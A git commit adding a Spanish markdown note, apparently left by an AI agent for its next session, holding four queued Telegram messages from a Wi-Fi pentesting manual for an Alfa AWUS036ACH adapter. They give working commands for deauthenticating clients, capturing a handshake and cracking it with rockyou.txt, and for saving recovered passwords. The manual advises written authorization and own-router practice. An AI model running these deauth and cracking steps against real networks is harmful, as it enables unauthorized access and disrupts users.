08-ago: [discovery] Lecciones USB Linux ext4 + Realtek 8812AU + scripts kali-todo
This commit is contained in:
85
docs/pending_telegram_send.md
Normal file
85
docs/pending_telegram_send.md
Normal file
@@ -0,0 +1,85 @@
|
||||
# PENDIENTE: Envío manual pentesting Alpha AWUS036ACH al canal IDD Telegram
|
||||
|
||||
**Estado:** 4 mensajes pendientes de envío (Partes 8-11)
|
||||
**Canal IDD:** -1003967773087
|
||||
**Razón del fallo:** Timeout MCP Telegram (servidor caído/sobrecargado)
|
||||
**Fecha:** 2026-08-08
|
||||
|
||||
## Instrucciones para la próxima sesión
|
||||
|
||||
Al iniciar, enviar estos 4 mensajes AL CANAL IDD (`-10033967773087`) en orden.
|
||||
Usar `telegram_send_message` con `peer: "-1003967773087"`.
|
||||
|
||||
**IMPORTANTE:** El manual COMPLETO (Partes 1-7 + 8-11) ya está guardado en:
|
||||
`docs/manual_pentesting_alpha_awus036ach.md`
|
||||
|
||||
Si el MCP Telegram sigue sin funcionar, enviar el contenido del fichero manual como 1 solo mensaje o copiarlo al portapapeles para que el usuario lo pegue manualmente.
|
||||
|
||||
---
|
||||
|
||||
## MENSAJE 1 - PARTE 8
|
||||
|
||||
PARTE 8: CRACKEAR LA CONTRASEÑA
|
||||
|
||||
Descomprime el diccionario:
|
||||
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
|
||||
|
||||
Crackea:
|
||||
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
|
||||
|
||||
Si esta en el diccionario veras:
|
||||
KEY FOUND! [ la_contraseña ]
|
||||
|
||||
Guarda la contraseña:
|
||||
echo "RED: CampusLab | PASS: la_contraseña" >> ~/wifi_cracked.txt
|
||||
|
||||
---
|
||||
|
||||
## MENSAJE 2 - PARTE 9
|
||||
|
||||
PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)
|
||||
|
||||
Si usas Kali Live, al reiniciar TODO se pierde.
|
||||
|
||||
Opcion A - Rufus Persistent Partition (ya lo hiciste en Parte 2)
|
||||
Si activaste Persistent storage en Rufus, los archivos en
|
||||
/home/kali se guardan automaticamente.
|
||||
|
||||
Opcion B - Montar particion persistente:
|
||||
sudo mkdir -p /mnt/persistence
|
||||
sudo mount /dev/sdb3 /mnt/persistence
|
||||
cp captura-01.cap /mnt/persistence/
|
||||
echo "RED: CampusLab | PASS: la_contraseña" > /mnt/persistence/wifi_cracked.txt
|
||||
sudo umount /mnt/persistence
|
||||
|
||||
Opcion C - Segundo USB o red:
|
||||
cp captura-01.cap /media/kali/MI_USB/
|
||||
|
||||
---
|
||||
|
||||
## MENSAJE 3 - PARTE 10
|
||||
|
||||
PARTE 10: RESUMEN DE COMANDOS RAPIDOS
|
||||
|
||||
Ver antena: lsusb && iwconfig
|
||||
Matar interfer.: sudo airmon-ng check kill
|
||||
Activar monitor: sudo airmon-ng start wlan0
|
||||
Escanear redes: sudo airodump-ng wlan0mon
|
||||
Capturar 1 red: sudo airodump-ng -c CH --bssid MAC -w file wlan0mon
|
||||
Deauth: sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon
|
||||
Crackear: aircrack-ng -w rockyou.txt file.cap
|
||||
Salir monitor: sudo airmon-ng stop wlan0mon
|
||||
|
||||
---
|
||||
|
||||
## MENSAJE 4 - PARTE 11
|
||||
|
||||
PARTE 11: TIPS PARA EL LABORATORIO
|
||||
|
||||
1. Empieza con escaneo pasivo (airodump-ng)
|
||||
2. Documenta: redes, canales, cifrado
|
||||
3. Solo testea redes con autorizacion escrita
|
||||
4. Practica primero con tu propio router
|
||||
5. rockyou.txt en /usr/share/wordlists/
|
||||
6. No hagas deauth en redes publicas reales
|
||||
7. Senal mala? Acercate al router o usa reflector
|
||||
Reference in New Issue
Block a user